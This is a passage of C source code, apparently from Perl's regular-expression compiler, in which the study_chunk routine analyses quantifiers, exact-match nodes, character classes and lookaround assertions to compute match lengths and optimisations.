uc = *((U8*)STRING(scan));
}
min += l;
if (flags & SCF_DO_SUBSTR) { /* Update longest substr. */
/* The code below prefers earlier match for fixed
offset, later match for variable offset. */
if (data->last_end == -1) { /* Update the start info. */
data->last_start_min = data->pos_min;
data->last_start_max = is_inf
? SSize_t_MAX : data->pos_min + data->pos_delta;
}
sv_catpvn(data->last_found, STRING(scan), STR_LEN(scan));
if (UTF)
SvUTF8_on(data->last_found);
{
SV * const sv = data->last_found;
MAGIC * const mg = SvUTF8(sv) && SvMAGICAL(sv) ?
mg_find(sv, PERL_MAGIC_utf8) : NULL;
if (mg && mg->mg_len >= 0)
mg->mg_len += utf8_length((U8*)STRING(scan),
(U8*)STRING(scan)+STR_LEN(scan));
}
data->last_end = data->pos_min + l;
data->pos_min += l; /* As in the first entry. */
data->flags &= ~SF_BEFORE_EOL;
}
/* ANDing the code point leaves at most it, and not in locale, and
* can't match null string */
if (flags & SCF_DO_STCLASS_AND) {
ssc_cp_and(data->start_class, uc);
ANYOF_FLAGS(data->start_class) &= ~SSC_MATCHES_EMPTY_STRING;
ssc_clear_locale(data->start_class);
}
else if (flags & SCF_DO_STCLASS_OR) {
ssc_add_cp(data->start_class, uc);
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
/* See commit msg 749e076fceedeb708a624933726e7989f2302f6a */
ANYOF_FLAGS(data->start_class) &= ~SSC_MATCHES_EMPTY_STRING;
}
flags &= ~SCF_DO_STCLASS;
}
else if (PL_regkind[OP(scan)] == EXACT) {
/* But OP != EXACT!, so is EXACTFish */
SSize_t l = STR_LEN(scan);
const U8 * s = (U8*)STRING(scan);
/* Search for fixed substrings supports EXACT only. */
if (flags & SCF_DO_SUBSTR) {
assert(data);
scan_commit(pRExC_state, data, minlenp, is_inf);
}
if (UTF) {
l = utf8_length(s, s + l);
}
if (unfolded_multi_char) {
RExC_seen |= REG_UNFOLDED_MULTI_SEEN;
}
min += l - min_subtract;
assert (min >= 0);
delta += min_subtract;
if (flags & SCF_DO_SUBSTR) {
data->pos_min += l - min_subtract;
if (data->pos_min < 0) {
data->pos_min = 0;
}
data->pos_delta += min_subtract;
if (min_subtract) {
data->cur_is_floating = 1; /* float */
}
}
if (flags & SCF_DO_STCLASS) {
SV* EXACTF_invlist = _make_exactf_invlist(pRExC_state, scan);
assert(EXACTF_invlist);
if (flags & SCF_DO_STCLASS_AND) {
if (OP(scan) != EXACTFL)
ssc_clear_locale(data->start_class);
ANYOF_FLAGS(data->start_class) &= ~SSC_MATCHES_EMPTY_STRING;
ANYOF_POSIXL_ZERO(data->start_class);
ssc_intersection(data->start_class, EXACTF_invlist, FALSE);
}
else { /* SCF_DO_STCLASS_OR */
ssc_union(data->start_class, EXACTF_invlist, FALSE);
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
/* See commit msg 749e076fceedeb708a624933726e7989f2302f6a */
ANYOF_FLAGS(data->start_class) &= ~SSC_MATCHES_EMPTY_STRING;
}
flags &= ~SCF_DO_STCLASS;
SvREFCNT_dec(EXACTF_invlist);
}
}
else if (REGNODE_VARIES(OP(scan))) {
SSize_t mincount, maxcount, minnext, deltanext, pos_before = 0;
I32 fl = 0, f = flags;
regnode * const oscan = scan;
regnode_ssc this_class;
regnode_ssc *oclass = NULL;
I32 next_is_eval = 0;
switch (PL_regkind[OP(scan)]) {
case WHILEM: /* End of (?:...)* . */
scan = NEXTOPER(scan);
goto finish;
case PLUS:
if (flags & (SCF_DO_SUBSTR | SCF_DO_STCLASS)) {
next = NEXTOPER(scan);
if ( OP(next) == EXACT
|| OP(next) == EXACT_ONLY8
|| OP(next) == EXACTL
|| (flags & SCF_DO_STCLASS))
{
mincount = 1;
maxcount = REG_INFTY;
next = regnext(scan);
scan = NEXTOPER(scan);
goto do_curly;
}
}
if (flags & SCF_DO_SUBSTR)
data->pos_min++;
min++;
/* FALLTHROUGH */
case STAR:
next = NEXTOPER(scan);
/* This temporary node can now be turned into EXACTFU, and
* must, as regexec.c doesn't handle it */
if (OP(next) == EXACTFU_S_EDGE) {
OP(next) = EXACTFU;
}
if ( STR_LEN(next) == 1
&& isALPHA_A(* STRING(next))
&& ( OP(next) == EXACTFAA
|| ( OP(next) == EXACTFU
&& ! HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(* STRING(next)))))
{
/* These differ in just one bit */
U8 mask = ~ ('A' ^ 'a');
assert(isALPHA_A(* STRING(next)));
/* Then replace it by an ANYOFM node, with
* the mask set to the complement of the
* bit that differs between upper and lower
* case, and the lowest code point of the
* pair (which the '&' forces) */
OP(next) = ANYOFM;
ARG_SET(next, *STRING(next) & mask);
FLAGS(next) = mask;
}
if (flags & SCF_DO_STCLASS) {
mincount = 0;
maxcount = REG_INFTY;
next = regnext(scan);
scan = NEXTOPER(scan);
goto do_curly;
}
if (flags & SCF_DO_SUBSTR) {
scan_commit(pRExC_state, data, minlenp, is_inf);
/* Cannot extend fixed substrings */
data->cur_is_floating = 1; /* float */
}
is_inf = is_inf_internal = 1;
scan = regnext(scan);
goto optimize_curly_tail;
case CURLY:
if (stopparen>0 && (OP(scan)==CURLYN || OP(scan)==CURLYM)
&& (scan->flags == stopparen))
{
mincount = 1;
maxcount = 1;
} else {
mincount = ARG1(scan);
maxcount = ARG2(scan);
}
next = regnext(scan);
if (OP(scan) == CURLYX) {
I32 lp = (data ? *(data->last_closep) : 0);
scan->flags = ((lp <= (I32)U8_MAX) ? (U8)lp : U8_MAX);
}
scan = NEXTOPER(scan) + EXTRA_STEP_2ARGS;
next_is_eval = (OP(scan) == EVAL);
do_curly:
if (flags & SCF_DO_SUBSTR) {
if (mincount == 0)
scan_commit(pRExC_state, data, minlenp, is_inf);
/* Cannot extend fixed substrings */
pos_before = data->pos_min;
}
if (data) {
fl = data->flags;
data->flags &= ~(SF_HAS_PAR|SF_IN_PAR|SF_HAS_EVAL);
if (is_inf)
data->flags |= SF_IS_INF;
}
if (flags & SCF_DO_STCLASS) {
ssc_init(pRExC_state, &this_class);
oclass = data->start_class;
data->start_class = &this_class;
f |= SCF_DO_STCLASS_AND;
f &= ~SCF_DO_STCLASS_OR;
}
/* Exclude from super-linear cache processing any {n,m}
regops for which the combination of input pos and regex
pos is not enough information to determine if a match
will be possible.
For example, in the regex /foo(bar\s*){4,8}baz/ with the
regex pos at the \s*, the prospects for a match depend not
only on the input position but also on how many (bar\s*)
repeats into the {4,8} we are. */
if ((mincount > 1) || (maxcount > 1 && maxcount != REG_INFTY))
f &= ~SCF_WHILEM_VISITED_POS;
/* This will finish on WHILEM, setting scan, or on NULL: */
/* recurse study_chunk() on loop bodies */
minnext = study_chunk(pRExC_state, &scan, minlenp, &deltanext,
last, data, stopparen, recursed_depth, NULL,
(mincount == 0
? (f & ~SCF_DO_SUBSTR)
: f)
,depth+1);
if (flags & SCF_DO_STCLASS)
data->start_class = oclass;
if (mincount == 0 || minnext == 0) {
if (flags & SCF_DO_STCLASS_OR) {
ssc_or(pRExC_state, data->start_class, (regnode_charclass *) &this_class);
}
else if (flags & SCF_DO_STCLASS_AND) {
/* Switch to OR mode: cache the old value of
* data->start_class */
INIT_AND_WITHP;
StructCopy(data->start_class, and_withp, regnode_ssc);
flags &= ~SCF_DO_STCLASS_AND;
StructCopy(&this_class, data->start_class, regnode_ssc);
flags |= SCF_DO_STCLASS_OR;
ANYOF_FLAGS(data->start_class)
|= SSC_MATCHES_EMPTY_STRING;
}
} else { /* Non-zero len */
if (flags & SCF_DO_STCLASS_OR) {
ssc_or(pRExC_state, data->start_class, (regnode_charclass *) &this_class);
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
}
else if (flags & SCF_DO_STCLASS_AND)
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) &this_class);
flags &= ~SCF_DO_STCLASS;
}
if (!scan) /* It was not CURLYX, but CURLY. */
scan = next;
if (((flags & (SCF_TRIE_DOING_RESTUDY|SCF_DO_SUBSTR))==SCF_DO_SUBSTR)
/* ? quantifier ok, except for (?{ ... }) */
&& (next_is_eval || !(mincount == 0 && maxcount == 1))
&& (minnext == 0) && (deltanext == 0)
&& data && !(data->flags & (SF_HAS_PAR|SF_IN_PAR))
&& maxcount <= REG_INFTY/3) /* Complement check for big
count */
{
_WARN_HELPER(RExC_precomp_end, packWARN(WARN_REGEXP),
Perl_ck_warner(aTHX_ packWARN(WARN_REGEXP),
"Quantifier unexpected on zero-length expression "
"in regex m/%" UTF8f "/",
UTF8fARG(UTF, RExC_precomp_end - RExC_precomp,
RExC_precomp)));
}
if ( ( minnext > 0 && mincount >= SSize_t_MAX / minnext )
|| min >= SSize_t_MAX - minnext * mincount )
{
FAIL("Regexp out of space");
}
min += minnext * mincount;
is_inf_internal |= deltanext == SSize_t_MAX
|| (maxcount == REG_INFTY && minnext + deltanext > 0);
is_inf |= is_inf_internal;
if (is_inf) {
delta = SSize_t_MAX;
} else {
delta += (minnext + deltanext) * maxcount
- minnext * mincount;
}
/* Try powerful optimization CURLYX => CURLYN. */
if ( OP(oscan) == CURLYX && data
&& data->flags & SF_IN_PAR
&& !(data->flags & SF_HAS_EVAL)
&& !deltanext && minnext == 1 ) {
/* Try to optimize to CURLYN. */
regnode *nxt = NEXTOPER(oscan) + EXTRA_STEP_2ARGS;
regnode * const nxt1 = nxt;
#ifdef DEBUGGING
regnode *nxt2;
#endif
/* Skip open. */
nxt = regnext(nxt);
if (!REGNODE_SIMPLE(OP(nxt))
&& !(PL_regkind[OP(nxt)] == EXACT
&& STR_LEN(nxt) == 1))
goto nogo;
#ifdef DEBUGGING
nxt2 = nxt;
#endif
nxt = regnext(nxt);
if (OP(nxt) != CLOSE)
goto nogo;
if (RExC_open_parens) {
/*open->CURLYM*/
RExC_open_parens[ARG(nxt1)] = REGNODE_OFFSET(oscan);
/*close->while*/
RExC_close_parens[ARG(nxt1)] = REGNODE_OFFSET(nxt) + 2;
}
/* Now we know that nxt2 is the only contents: */
oscan->flags = (U8)ARG(nxt);
OP(oscan) = CURLYN;
OP(nxt1) = NOTHING; /* was OPEN. */
#ifdef DEBUGGING
OP(nxt1 + 1) = OPTIMIZED; /* was count. */
NEXT_OFF(nxt1+ 1) = 0; /* just for consistency. */
NEXT_OFF(nxt2) = 0; /* just for consistency with CURLY. */
OP(nxt) = OPTIMIZED; /* was CLOSE. */
OP(nxt + 1) = OPTIMIZED; /* was count. */
NEXT_OFF(nxt+ 1) = 0; /* just for consistency. */
#endif
}
nogo:
/* Try optimization CURLYX => CURLYM. */
if ( OP(oscan) == CURLYX && data
&& !(data->flags & SF_HAS_PAR)
&& !(data->flags & SF_HAS_EVAL)
&& !deltanext /* atom is fixed width */
&& minnext != 0 /* CURLYM can't handle zero width */
/* Nor characters whose fold at run-time may be
* multi-character */
&& ! (RExC_seen & REG_UNFOLDED_MULTI_SEEN)
) {
/* XXXX How to optimize if data == 0? */
/* Optimize to a simpler form. */
regnode *nxt = NEXTOPER(oscan) + EXTRA_STEP_2ARGS; /* OPEN */
regnode *nxt2;
OP(oscan) = CURLYM;
while ( (nxt2 = regnext(nxt)) /* skip over embedded stuff*/
&& (OP(nxt2) != WHILEM))
nxt = nxt2;
OP(nxt2) = SUCCEED; /* Whas WHILEM */
/* Need to optimize away parenths. */
if ((data->flags & SF_IN_PAR) && OP(nxt) == CLOSE) {
/* Set the parenth number. */
regnode *nxt1 = NEXTOPER(oscan) + EXTRA_STEP_2ARGS; /* OPEN*/
oscan->flags = (U8)ARG(nxt);
if (RExC_open_parens) {
/*open->CURLYM*/
RExC_open_parens[ARG(nxt1)] = REGNODE_OFFSET(oscan);
/*close->NOTHING*/
RExC_close_parens[ARG(nxt1)] = REGNODE_OFFSET(nxt2)
+ 1;
}
OP(nxt1) = OPTIMIZED; /* was OPEN. */
OP(nxt) = OPTIMIZED; /* was CLOSE. */
#ifdef DEBUGGING
OP(nxt1 + 1) = OPTIMIZED; /* was count. */
OP(nxt + 1) = OPTIMIZED; /* was count. */
NEXT_OFF(nxt1 + 1) = 0; /* just for consistency. */
NEXT_OFF(nxt + 1) = 0; /* just for consistency. */
#endif
#if 0
while ( nxt1 && (OP(nxt1) != WHILEM)) {
regnode *nnxt = regnext(nxt1);
if (nnxt == nxt) {
if (reg_off_by_arg[OP(nxt1)])
ARG_SET(nxt1, nxt2 - nxt1);
else if (nxt2 - nxt1 < U16_MAX)
NEXT_OFF(nxt1) = nxt2 - nxt1;
else
OP(nxt) = NOTHING; /* Cannot beautify */
}
nxt1 = nnxt;
}
#endif
/* Optimize again: */
/* recurse study_chunk() on optimised CURLYX => CURLYM */
study_chunk(pRExC_state, &nxt1, minlenp, &deltanext, nxt,
NULL, stopparen, recursed_depth, NULL, 0,
depth+1);
}
else
oscan->flags = 0;
}
else if ((OP(oscan) == CURLYX)
&& (flags & SCF_WHILEM_VISITED_POS)
/* See the comment on a similar expression above.
However, this time it's not a subexpression
we care about, but the expression itself. */
&& (maxcount == REG_INFTY)
&& data) {
/* This stays as CURLYX, we can put the count/of pair. */
/* Find WHILEM (as in regexec.c) */
regnode *nxt = oscan + NEXT_OFF(oscan);
if (OP(PREVOPER(nxt)) == NOTHING) /* LONGJMP */
nxt += ARG(nxt);
nxt = PREVOPER(nxt);
if (nxt->flags & 0xf) {
/* we've already set whilem count on this node */
} else if (++data->whilem_c < 16) {
assert(data->whilem_c <= RExC_whilem_seen);
nxt->flags = (U8)(data->whilem_c
| (RExC_whilem_seen << 4)); /* On WHILEM */
}
}
if (data && fl & (SF_HAS_PAR|SF_IN_PAR))
pars++;
if (flags & SCF_DO_SUBSTR) {
SV *last_str = NULL;
STRLEN last_chrs = 0;
int counted = mincount != 0;
if (data->last_end > 0 && mincount != 0) { /* Ends with a
string. */
SSize_t b = pos_before >= data->last_start_min
? pos_before : data->last_start_min;
STRLEN l;
const char * const s = SvPV_const(data->last_found, l);
SSize_t old = b - data->last_start_min;
assert(old >= 0);
if (UTF)
old = utf8_hop_forward((U8*)s, old,
(U8 *) SvEND(data->last_found))
- (U8*)s;
l -= old;
/* Get the added string: */
last_str = newSVpvn_utf8(s + old, l, UTF);
last_chrs = UTF ? utf8_length((U8*)(s + old),
(U8*)(s + old + l)) : l;
if (deltanext == 0 && pos_before == b) {
/* What was added is a constant string */
if (mincount > 1) {
SvGROW(last_str, (mincount * l) + 1);
repeatcpy(SvPVX(last_str) + l,
SvPVX_const(last_str), l,
mincount - 1);
SvCUR_set(last_str, SvCUR(last_str) * mincount);
/* Add additional parts. */
SvCUR_set(data->last_found,
SvCUR(data->last_found) - l);
sv_catsv(data->last_found, last_str);
{
SV * sv = data->last_found;
MAGIC *mg =
SvUTF8(sv) && SvMAGICAL(sv) ?
mg_find(sv, PERL_MAGIC_utf8) : NULL;
if (mg && mg->mg_len >= 0)
mg->mg_len += last_chrs * (mincount-1);
}
last_chrs *= mincount;
data->last_end += l * (mincount - 1);
}
} else {
/* start offset must point into the last copy */
data->last_start_min += minnext * (mincount - 1);
data->last_start_max =
is_inf
? SSize_t_MAX
: data->last_start_max +
(maxcount - 1) * (minnext + data->pos_delta);
}
}
/* It is counted once already... */
data->pos_min += minnext * (mincount - counted);
#if 0
Perl_re_printf( aTHX_ "counted=%" UVuf " deltanext=%" UVuf
" SSize_t_MAX=%" UVuf " minnext=%" UVuf
" maxcount=%" UVuf " mincount=%" UVuf "\n",
(UV)counted, (UV)deltanext, (UV)SSize_t_MAX, (UV)minnext, (UV)maxcount,
(UV)mincount);
if (deltanext != SSize_t_MAX)
Perl_re_printf( aTHX_ "LHS=%" UVuf " RHS=%" UVuf "\n",
(UV)(-counted * deltanext + (minnext + deltanext) * maxcount
- minnext * mincount), (UV)(SSize_t_MAX - data->pos_delta));
#endif
if (deltanext == SSize_t_MAX
|| -counted * deltanext + (minnext + deltanext) * maxcount - minnext * mincount >= SSize_t_MAX - data->pos_delta)
data->pos_delta = SSize_t_MAX;
else
data->pos_delta += - counted * deltanext +
(minnext + deltanext) * maxcount - minnext * mincount;
if (mincount != maxcount) {
/* Cannot extend fixed substrings found inside
the group. */
scan_commit(pRExC_state, data, minlenp, is_inf);
if (mincount && last_str) {
SV * const sv = data->last_found;
MAGIC * const mg = SvUTF8(sv) && SvMAGICAL(sv) ?
mg_find(sv, PERL_MAGIC_utf8) : NULL;
if (mg)
mg->mg_len = -1;
sv_setsv(sv, last_str);
data->last_end = data->pos_min;
data->last_start_min = data->pos_min - last_chrs;
data->last_start_max = is_inf
? SSize_t_MAX
: data->pos_min + data->pos_delta - last_chrs;
}
data->cur_is_floating = 1; /* float */
}
SvREFCNT_dec(last_str);
}
if (data && (fl & SF_HAS_EVAL))
data->flags |= SF_HAS_EVAL;
optimize_curly_tail:
rck_elide_nothing(oscan);
continue;
default:
#ifdef DEBUGGING
Perl_croak(aTHX_ "panic: unexpected varying REx opcode %d",
OP(scan));
#endif
case REF:
case CLUMP:
if (flags & SCF_DO_SUBSTR) {
/* Cannot expect anything... */
scan_commit(pRExC_state, data, minlenp, is_inf);
data->cur_is_floating = 1; /* float */
}
is_inf = is_inf_internal = 1;
if (flags & SCF_DO_STCLASS_OR) {
if (OP(scan) == CLUMP) {
/* Actually is any start char, but very few code points
* aren't start characters */
ssc_match_all_cp(data->start_class);
}
else {
ssc_anything(data->start_class);
}
}
flags &= ~SCF_DO_STCLASS;
break;
}
}
else if (OP(scan) == LNBREAK) {
if (flags & SCF_DO_STCLASS) {
if (flags & SCF_DO_STCLASS_AND) {
ssc_intersection(data->start_class,
PL_XPosix_ptrs[_CC_VERTSPACE], FALSE);
ssc_clear_locale(data->start_class);
ANYOF_FLAGS(data->start_class)
&= ~SSC_MATCHES_EMPTY_STRING;
}
else if (flags & SCF_DO_STCLASS_OR) {
ssc_union(data->start_class,
PL_XPosix_ptrs[_CC_VERTSPACE],
FALSE);
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
/* See commit msg for
* 749e076fceedeb708a624933726e7989f2302f6a */
ANYOF_FLAGS(data->start_class)
&= ~SSC_MATCHES_EMPTY_STRING;
}
flags &= ~SCF_DO_STCLASS;
}
min++;
if (delta != SSize_t_MAX)
delta++; /* Because of the 2 char string cr-lf */
if (flags & SCF_DO_SUBSTR) {
/* Cannot expect anything... */
scan_commit(pRExC_state, data, minlenp, is_inf);
data->pos_min += 1;
if (data->pos_delta != SSize_t_MAX) {
data->pos_delta += 1;
}
data->cur_is_floating = 1; /* float */
}
}
else if (REGNODE_SIMPLE(OP(scan))) {
if (flags & SCF_DO_SUBSTR) {
scan_commit(pRExC_state, data, minlenp, is_inf);
data->pos_min++;
}
min++;
if (flags & SCF_DO_STCLASS) {
bool invert = 0;
SV* my_invlist = NULL;
U8 namedclass;
/* See commit msg 749e076fceedeb708a624933726e7989f2302f6a */
ANYOF_FLAGS(data->start_class) &= ~SSC_MATCHES_EMPTY_STRING;
/* Some of the logic below assumes that switching
locale on will only add false positives. */
switch (OP(scan)) {
default:
#ifdef DEBUGGING
Perl_croak(aTHX_ "panic: unexpected simple REx opcode %d",
OP(scan));
#endif
case SANY:
if (flags & SCF_DO_STCLASS_OR) /* Allow everything */
ssc_match_all_cp(data->start_class);
break;
case REG_ANY:
{
SV* REG_ANY_invlist = _new_invlist(2);
REG_ANY_invlist = add_cp_to_invlist(REG_ANY_invlist,
'\n');
if (flags & SCF_DO_STCLASS_OR) {
ssc_union(data->start_class,
REG_ANY_invlist,
TRUE /* TRUE => invert, hence all but \n
*/
);
}
else if (flags & SCF_DO_STCLASS_AND) {
ssc_intersection(data->start_class,
REG_ANY_invlist,
TRUE /* TRUE => invert */
);
ssc_clear_locale(data->start_class);
}
SvREFCNT_dec_NN(REG_ANY_invlist);
}
break;
case ANYOFD:
case ANYOFL:
case ANYOFPOSIXL:
case ANYOFH:
case ANYOF:
if (flags & SCF_DO_STCLASS_AND)
ssc_and(pRExC_state, data->start_class,
(regnode_charclass *) scan);
else
ssc_or(pRExC_state, data->start_class,
(regnode_charclass *) scan);
break;
case NANYOFM:
case ANYOFM:
{
SV* cp_list = get_ANYOFM_contents(scan);
if (flags & SCF_DO_STCLASS_OR) {
ssc_union(data->start_class, cp_list, invert);
}
else if (flags & SCF_DO_STCLASS_AND) {
ssc_intersection(data->start_class, cp_list, invert);
}
SvREFCNT_dec_NN(cp_list);
break;
}
case NPOSIXL:
invert = 1;
/* FALLTHROUGH */
case POSIXL:
namedclass = classnum_to_namedclass(FLAGS(scan)) + invert;
if (flags & SCF_DO_STCLASS_AND) {
bool was_there = cBOOL(
ANYOF_POSIXL_TEST(data->start_class,
namedclass));
ANYOF_POSIXL_ZERO(data->start_class);
if (was_there) { /* Do an AND */
ANYOF_POSIXL_SET(data->start_class, namedclass);
}
/* No individual code points can now match */
data->start_class->invlist
= sv_2mortal(_new_invlist(0));
}
else {
int complement = namedclass + ((invert) ? -1 : 1);
assert(flags & SCF_DO_STCLASS_OR);
/* If the complement of this class was already there,
* the result is that they match all code points,
* (\d + \D == everything). Remove the classes from
* future consideration. Locale is not relevant in
* this case */
if (ANYOF_POSIXL_TEST(data->start_class, complement)) {
ssc_match_all_cp(data->start_class);
ANYOF_POSIXL_CLEAR(data->start_class, namedclass);
ANYOF_POSIXL_CLEAR(data->start_class, complement);
}
else { /* The usual case; just add this class to the
existing set */
ANYOF_POSIXL_SET(data->start_class, namedclass);
}
}
break;
case NPOSIXA: /* For these, we always know the exact set of
what's matched */
invert = 1;
/* FALLTHROUGH */
case POSIXA:
my_invlist = invlist_clone(PL_Posix_ptrs[FLAGS(scan)], NULL);
goto join_posix_and_ascii;
case NPOSIXD:
case NPOSIXU:
invert = 1;
/* FALLTHROUGH */
case POSIXD:
case POSIXU:
my_invlist = invlist_clone(PL_XPosix_ptrs[FLAGS(scan)], NULL);
/* NPOSIXD matches all upper Latin1 code points unless the
* target string being matched is UTF-8, which is
* unknowable until match time. Since we are going to
* invert, we want to get rid of all of them so that the
* inversion will match all */
if (OP(scan) == NPOSIXD) {
_invlist_subtract(my_invlist, PL_UpperLatin1,
&my_invlist);
}
join_posix_and_ascii:
if (flags & SCF_DO_STCLASS_AND) {
ssc_intersection(data->start_class, my_invlist, invert);
ssc_clear_locale(data->start_class);
}
else {
assert(flags & SCF_DO_STCLASS_OR);
ssc_union(data->start_class, my_invlist, invert);
}
SvREFCNT_dec(my_invlist);
}
if (flags & SCF_DO_STCLASS_OR)
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
flags &= ~SCF_DO_STCLASS;
}
}
else if (PL_regkind[OP(scan)] == EOL && flags & SCF_DO_SUBSTR) {
data->flags |= (OP(scan) == MEOL
? SF_BEFORE_MEOL
: SF_BEFORE_SEOL);
scan_commit(pRExC_state, data, minlenp, is_inf);
}
else if ( PL_regkind[OP(scan)] == BRANCHJ
/* Lookbehind, or need to calculate parens/evals/stclass: */
&& (scan->flags || data || (flags & SCF_DO_STCLASS))
&& (OP(scan) == IFMATCH || OP(scan) == UNLESSM))
{
if ( !PERL_ENABLE_POSITIVE_ASSERTION_STUDY
|| OP(scan) == UNLESSM )
{
/* Negative Lookahead/lookbehind
In this case we can't do fixed string optimisation.
*/
SSize_t deltanext, minnext, fake = 0;
regnode *nscan;
regnode_ssc intrnl;
int f = 0;
StructCopy(&zero_scan_data, &data_fake, scan_data_t);
if (data) {
data_fake.whilem_c = data->whilem_c;
data_fake.last_closep = data->last_closep;
}
else
data_fake.last_closep = &fake;
data_fake.pos_delta = delta;
if ( flags & SCF_DO_STCLASS && !scan->flags
&& OP(scan) == IFMATCH ) { /* Lookahead */
ssc_init(pRExC_state, &intrnl);
data_fake.start_class = &intrnl;
f |= SCF_DO_STCLASS_AND;
}
if (flags & SCF_WHILEM_VISITED_POS)
f |= SCF_WHILEM_VISITED_POS;
next = regnext(scan);
nscan = NEXTOPER(NEXTOPER(scan));
/* recurse study_chunk() for lookahead body */
minnext = study_chunk(pRExC_state, &nscan, minlenp, &deltanext,
last, &data_fake, stopparen,
recursed_depth, NULL, f, depth+1);
if (scan->flags) {
if ( deltanext < 0
|| deltanext > (I32) U8_MAX
|| minnext > (I32)U8_MAX
|| minnext + deltanext > (I32)U8_MAX)
{
FAIL2("Lookbehind longer than %" UVuf " not implemented",
(UV)U8_MAX);
}
/* The 'next_off' field has been repurposed to count the
* additional starting positions to try beyond the initial
* one. (This leaves it at 0 for non-variable length
* matches to avoid breakage for those not using this
* extension) */
if (deltanext) {
scan->next_off = deltanext;
ckWARNexperimental(RExC_parse,
WARN_EXPERIMENTAL__VLB,
"Variable length lookbehind is experimental");
}
scan->flags = (U8)minnext + deltanext;
}
if (data) {
if (data_fake.flags & (SF_HAS_PAR|SF_IN_PAR))
pars++;
if (data_fake.flags & SF_HAS_EVAL)
data->flags |= SF_HAS_EVAL;
data->whilem_c = data_fake.whilem_c;
}
if (f & SCF_DO_STCLASS_AND) {
if (flags & SCF_DO_STCLASS_OR) {
/* OR before, AND after: ideally we would recurse with
* data_fake to get the AND applied by study of the
* remainder of the pattern, and then derecurse;
* *** HACK *** for now just treat as "no information".
* See [perl #56690].
*/
ssc_init(pRExC_state, data->start_class);
} else {
/* AND before and after: combine and continue. These
* assertions are zero-length, so can match an EMPTY
* string */
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) &intrnl);
ANYOF_FLAGS(data->start_class)
|= SSC_MATCHES_EMPTY_STRING;
}
}
}
#if PERL_ENABLE_POSITIVE_ASSERTION_STUDY
else {
/* Positive Lookahead/lookbehind
In this case we can do fixed string optimisation,
but we must be careful about it. Note in the case of
lookbehind the positions will be offset by the minimum
length of the pattern, something we won't know about
until after the recurse.
*/
SSize_t deltanext, fake = 0;
regnode *nscan;
regnode_ssc intrnl;
int f = 0;
/* We use SAVEFREEPV so that when the full compile
is finished perl will clean up the allocated
minlens when it's all done. This way we don't
have to worry about freeing them when we know
they wont be used, which would be a pain.
*/
SSize_t *minnextp;
Newx( minnextp, 1, SSize_t );
SAVEFREEPV(minnextp);
if (data) {
StructCopy(data, &data_fake, scan_data_t);
if ((flags & SCF_DO_SUBSTR) && data->last_found) {
f |= SCF_DO_SUBSTR;
if (scan->flags)
scan_commit(pRExC_state, &data_fake, minlenp, is_inf);
data_fake.last_found=newSVsv(data->last_found);
}
}
else
data_fake.last_closep = &fake;
data_fake.flags = 0;
data_fake.substrs[0].flags = 0;
data_fake.substrs[1].flags = 0;
data_fake.pos_delta = delta;
if (is_inf)
data_fake.flags |= SF_IS_INF;
if ( flags & SCF_DO_STCLASS && !scan->flags
&& OP(scan) == IFMATCH ) { /* Lookahead */
ssc_init(pRExC_state, &intrnl);
data_fake.start_class = &intrnl;
f |= SCF_DO_STCLASS_AND;
}
if (flags & SCF_WHILEM_VISITED_POS)
f |= SCF_WHILEM_VISITED_POS;
next = regnext(scan);
nscan = NEXTOPER(NEXTOPER(scan));
/* positive lookahead study_chunk() recursion */
*minnextp = study_chunk(pRExC_state, &nscan, minnextp,
&deltanext, last, &data_fake,
stopparen, recursed_depth, NULL,
f, depth+1);
if (scan->flags) {
assert(0); /* This code has never been tested since this
is normally not compiled */
if ( deltanext < 0
|| deltanext > (I32) U8_MAX
|| *minnextp > (I32)U8_MAX
|| *minnextp + deltanext > (I32)U8_MAX)
{
FAIL2("Lookbehind longer than %" UVuf " not implemented",
(UV)U8_MAX);
}
if (deltanext) {
scan->next_off = deltanext;
}
scan->flags = (U8)*minnextp + deltanext;
}
*minnextp += min;
if (f & SCF_DO_STCLASS_AND) {
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) &intrnl);
ANYOF_FLAGS(data->start_class) |= SSC_MATCHES_EMPTY_STRING;
}
if (data) {
if (data_fake.flags & (SF_HAS_PAR|SF_IN_PAR))
pars++;
if (data_fake.flags & SF_HAS_EVAL)
data->flags |= SF_HAS_EVAL;
data->whilem_c = data_fake.whilem_c;
if ((flags & SCF_DO_SUBSTR) && data_fake.last_found) {
int i;
if (RExC_rx->minlen<*minnextp)
RExC_rx->minlen=*minnextp;
scan_commit(pRExC_state, &data_fake, minnextp, is_inf);
SvREFCNT_dec_NN(data_fake.last_found);
for (i = 0; i < 2; i++) {
if (data_fake.substrs[i].minlenp != minlenp) {
data->substrs[i].min_offset =
data_fake.substrs[i].min_offset;
data->substrs[i].max_offset =
data_fake.substrs[i].max_offset;
data->substrs[i].minlenp =
data_fake.substrs[i].minlenp;
data->substrs[i].lookbehind += scan->flags;
}
}
}
}
}
#endif
}
else if (OP(scan) == OPEN) {
if (stopparen != (I32)ARG(scan))
pars++;
}
else if (OP(scan) == CLOSE) {
if (stopparen == (I32)ARG(scan)) {
break;
}
if ((I32)ARG(scan) == is_par) {
next = regnext(scan);
if ( next && (OP(next) != WHILEM) && next < last)
is_par = 0; /* Disable optimization */
}
if (data)
*(data->last_closep) = ARG(scan);
}
else if (OP(scan) == EVAL) {
if (data)
data->flags |= SF_HAS_EVAL;
}
else if ( PL_regkind[OP(scan)] == ENDLIKE ) {
if (flags & SCF_DO_SUBSTR) {
scan_commit(pRExC_state, data, minlenp, is_inf);
flags &= ~SCF_DO_SUBSTR;
}
if (data && OP(scan)==ACCEPT) {
data->flags |= SCF_SEEN_ACCEPT;
if (stopmin > min)
stopmin = min;
}
}
else if (OP(scan) == LOGICAL && scan->flags == 2) /* Embedded follows */
{
if (flags & SCF_DO_SUBSTR) {
scan_commit(pRExC_state, data, minlenp, is_inf);
data->cur_is_floating = 1; /* float */
}
is_inf = is_inf_internal = 1;
if (flags & SCF_DO_STCLASS_OR) /* Allow everything */
ssc_anything(data->start_class);
flags &= ~SCF_DO_STCLASS;
}
else if (OP(scan) == GPOS) {
if (!(RExC_rx->intflags & PREGf_GPOS_FLOAT) &&
!(delta || is_inf || (data && data->pos_delta)))
{
